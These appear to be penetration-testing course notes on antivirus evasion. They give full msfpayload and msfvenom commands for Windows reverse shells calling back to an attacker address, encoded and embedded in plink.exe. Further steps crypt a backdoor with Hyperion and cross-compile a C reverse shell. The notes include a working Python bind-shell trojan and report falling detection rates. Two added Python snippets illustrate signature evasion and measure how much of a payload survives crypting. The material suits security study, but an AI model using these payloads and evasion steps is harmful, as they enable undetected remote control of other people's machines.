ANTIVIRUS AVOIDANCE - Overview
Bypassing antivirus software usually means changing or encrypting the contents of a known malicious file so that its binary structure changes. The signature written for the original file then no longer matches, and the new structure may get the file past the scanner. Depending on the type and quality of the antivirus product being tested, a bypass can sometimes be achieved by something as small as changing a couple of harmless strings inside the binary from lowercase to uppercase. Because different products use different signatures and technologies to detect malware, it is usually difficult to find a universal solution that bypasses all of them; getting past a given AV is quite often trial and error in a test environment. That said, Kali ships several tools that can help.
The examples below are the old way, using msfpayload and msfencode. These days we use msfvenom. The book should show this with up-to-date syntax.
Standard reverse shell without encoding:
#msfpayload windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=4444 X > ~/Desktop/shell_reverse.exe
Now encoded with x86/shikata_ga_nai, 9 iterations (-c 9):
#msfpayload windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=4444 | msfencode -e x86/shikata_ga_nai -t exe -c 9 -o ~/Desktop/shell_reverse_msf_encoded.exe
Now encoded with shikata_ga_nai, 9 iterations, and embedded into a non-malicious PE file (plink.exe) used as the template:
#msfpayload windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=4444 | msfencode -e x86/shikata_ga_nai -t exe -c 9 -x /usr/share/windows-binaries/plink.exe -o ~/Desktop/shell_reverse_msf_encoded_embedded.exe
UP-TO-DATE SYNTAX - encoded and embedded (msfvenom takes the iteration count with -i and the template executable with -x):
#msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=4444 -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -f exe -o ~/Desktop/msfvenom_encoded_embedded_reverse_shell.exe
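The following is an added illustration of what the encoding step above does to a static byte-signature scan, and of the catch that comes with it. It is not code from the course or from Metasploit: the "signatures", the sample payload, the rolling-XOR scheme and the constant STUB marker (standing in for the decoder code an encoder prepends) are all constructed here, and the nine keys play the role of the nine iterations passed with -c 9 / -i 9.

```python
"""Why multi-iteration encoding hides a byte signature, and what it cannot hide.

Added example for these notes, not Metasploit code. Everything below is
constructed: the scanner is a verbatim substring match, the encoder is a
rolling XOR, and STUB is a fixed marker standing in for a decoder stub.
"""
import struct

# Constructed sample payload: contains the run of bytes a toy signature keys on.
SAMPLE_PAYLOAD = b"\x90" * 8 + b"cmd.exe /c whoami" + b"\xcc" * 8

# Toy static signatures: exact byte runs, the way simple engines match.
SIGNATURES = {
    "toy.reverse-shell": b"cmd.exe /c whoami",
    "toy.encoder-stub": b"STUB",   # hits the constant decoder prefix
}

STUB = b"STUB"  # stands in for the constant decoder code prepended per layer


def scan(blob: bytes) -> list:
    """Return the names of all signatures found verbatim in blob."""
    return [name for name, sig in SIGNATURES.items() if sig in blob]


def xor_additive_encode(data: bytes, key: int) -> bytes:
    """One pass: XOR each byte with a key that advances by the plaintext byte.

    The feedback (key += plaintext byte) means equal input bytes produce
    different output bytes, so repeated strings leave no recognisable pattern.
    """
    out = bytearray()
    k = key & 0xFF
    for b in data:
        out.append(b ^ k)
        k = (k + b) & 0xFF
    return bytes(out)


def xor_additive_decode(data: bytes, key: int) -> bytes:
    """Inverse of xor_additive_encode with the same starting key."""
    out = bytearray()
    k = key & 0xFF
    for b in data:
        p = b ^ k
        out.append(p)
        k = (k + p) & 0xFF
    return bytes(out)


def encode_iterations(payload: bytes, keys: list) -> bytes:
    """Apply len(keys) passes; each wraps the previous output behind STUB + key."""
    blob = payload
    for key in keys:
        blob = STUB + struct.pack("B", key) + xor_additive_encode(blob, key)
    return blob


def decode_iterations(blob: bytes) -> bytes:
    """Peel layers off until the data no longer starts with the decoder marker."""
    while blob.startswith(STUB):
        key = blob[len(STUB)]
        blob = xor_additive_decode(blob[len(STUB) + 1:], key)
    return blob


def demo() -> dict:
    keys = [0x41, 0x13, 0x7E, 0x05, 0xA9, 0xC3, 0x2B, 0x58, 0x99]  # nine iterations
    encoded = encode_iterations(SAMPLE_PAYLOAD, keys)
    return {
        "raw_hits": scan(SAMPLE_PAYLOAD),        # payload signature fires
        "encoded_hits": scan(encoded),           # only the stub signature fires
        "roundtrip_ok": decode_iterations(encoded) == SAMPLE_PAYLOAD,
    }


if __name__ == "__main__":
    print(demo())
```

The payload signature disappears after the first pass and the bytes come back intact when the layers are peeled off, which is what happens in memory when the real decoder stub runs. What does not disappear is the stub itself: the encoded blob still matches "toy.encoder-stub", and that is exactly what vendors signature once an encoder's decoder is known, which is why encoding alone rarely gets a stock payload past a current product and why the course pairs it with a legitimate template binary.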
ANTIVIRUS AVOIDANCE - Packers and Crypters
Software protection tools and executable crypters are most commonly used by software vendors to obfuscate and license binaries, to prevent reverse-engineering attempts by software pirates. The same tools are effective at obfuscating malware and can often help avoid antivirus detection. One such open source crypter is called HYPERION and is present on Kali.
For this example, we have copied over our best performing payload and called it backdoor.exe.
We have then copied hyperion from the windows binaries section into the same folder as backdoor.exe.
Once extracted I cross-compile the hyperion source code to create a Windows executable.
NOTE: The syntax below is old - the example at the end of this section is up-to-date. I need to reference what I did in earlier modules to get the right details to run mingw.
hyperion-1.0#i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Invoke the Windows executable under wine and use it to protect the reverse-shell backdoor:
hyperion-1.0#wine hyperion.exe ../backdoor.exe ~/Desktop/crypted
The file has now been encrypted and protected. Detection rate has been halved.
EXAMPLE FROM THE BOOK: this looks to be the more up-to-date syntax.
root@kali:~# cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
root@kali:~# cp /usr/share/windows-binaries/Hyperion-1.0.zip .
root@kali:~# unzip Hyperion-1.0.zip
root@kali:~# cd Hyperion-1.0/
root@kali:~/Hyperion-1.0# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libgcc_s_sjlj-1.dll .
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++-6.dll .
root@kali:~/Hyperion-1.0# wine hyperion.exe ../backdoor.exe ../crypted.exe
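Before uploading crypted.exe (or any msfencode/msfvenom output) to a scanner, it is worth checking how much of the original binary survives verbatim in the new file, since those runs are what a static signature can still match. The check below is an added helper for these notes, not part of Hyperion or the course; the two sample "protected" files it builds for the demo are constructed (a plain XOR over the original, and a wrapper that simply appends the original unchanged), and real files are compared by passing two paths on the command line.

```python
"""Measure how many 16-byte runs of the original survive verbatim in the output.

Added helper for these notes, not part of Hyperion. A working crypter should
leave no such runs; a wrapper that only prepends a stub leaves all of them.
"""
import sys

CHUNK = 16  # about the length of a short byte signature

# Constructed demo inputs (not real files): a 1 KiB "original", a stub, and
# two ways of "protecting" it.
ORIGINAL = bytes(range(256)) * 4
STUB = b"LOADER-STUB-BYTES"
PROTECTED_GOOD = STUB + bytes(b ^ 0x55 for b in ORIGINAL)  # every byte changed
PROTECTED_BAD = STUB + ORIGINAL                            # original untouched


def residual_chunks(original: bytes, protected: bytes, chunk: int = CHUNK) -> dict:
    """Count non-overlapping chunk-sized slices of original found in protected.

    protected is indexed once into a set of all chunk-sized windows so the
    search is a hash lookup per slice rather than a scan per slice.
    """
    slices = [original[i:i + chunk]
              for i in range(0, len(original) - chunk + 1, chunk)]
    windows = {protected[i:i + chunk]
               for i in range(len(protected) - chunk + 1)}
    hits = [s for s in slices if s in windows]
    return {
        "chunks": len(slices),
        "surviving": len(hits),
        "ratio": (len(hits) / len(slices)) if slices else 0.0,
        "examples": [h.hex() for h in hits[:3]],   # first surviving runs
    }


def demo() -> dict:
    """Compare the two constructed outputs: ratios of 0.0 and 1.0 expected."""
    return {
        "good": residual_chunks(ORIGINAL, PROTECTED_GOOD)["ratio"],
        "bad": residual_chunks(ORIGINAL, PROTECTED_BAD)["ratio"],
    }


def main(argv: list) -> int:
    if len(argv) == 3:
        with open(argv[1], "rb") as f_orig, open(argv[2], "rb") as f_prot:
            result = residual_chunks(f_orig.read(), f_prot.read())
    else:
        result = demo()
    print(result)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run as `python3 residual.py backdoor.exe crypted.exe`; a ratio near zero is what you want from a crypter, while a high ratio means the payload bytes are sitting in the clear and the detection rate will reflect the original, not the wrapper. Sample hits are printed in hex so the surviving runs can be located with a hex editor.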
ANTIVIRUS AVOIDANCE - Private Custom Tools
An even more effective way to reduce detection is to use tools that are unknown to antivirus vendors, either by writing our own or by using non-mainstream code.
For example, a reverse shell written in C can be found with a Google search. Such code may not be commonly used, so vendors are less likely to have a signature for it.
Cross-compile reverse.c in Kali (-lws2_32 links the Winsock library):
$i586-mingw32msvc-gcc reverse.c -o ~/Desktop/custom-reverse.exe -lws2_32
This example resulted in a detection rate of 1/47.
Let's go one step further and write our own Python bind shell trojan.
import socket
import subprocess
host = '0.0.0.0'
port = 4444
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
client, address = s.accept()
client.send(b"[+] Welcome Master\r\n\r\n>")
while True:
    data = client.recv(1024)
    if not data:
        break
    # run the received line through the local shell and send back its output
    proc = subprocess.Popen(data.decode().strip(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    data = proc.stdout.read() + proc.stderr.read()
    client.send(data + b"\r\n>")
This code listens on port 4444 and runs anything sent to it through the shell, returning the output to the connecting client: a basic bind shell trojan.
We then compile this Python code into a Windows executable using PyInstaller.
Detection rate is now 2/47.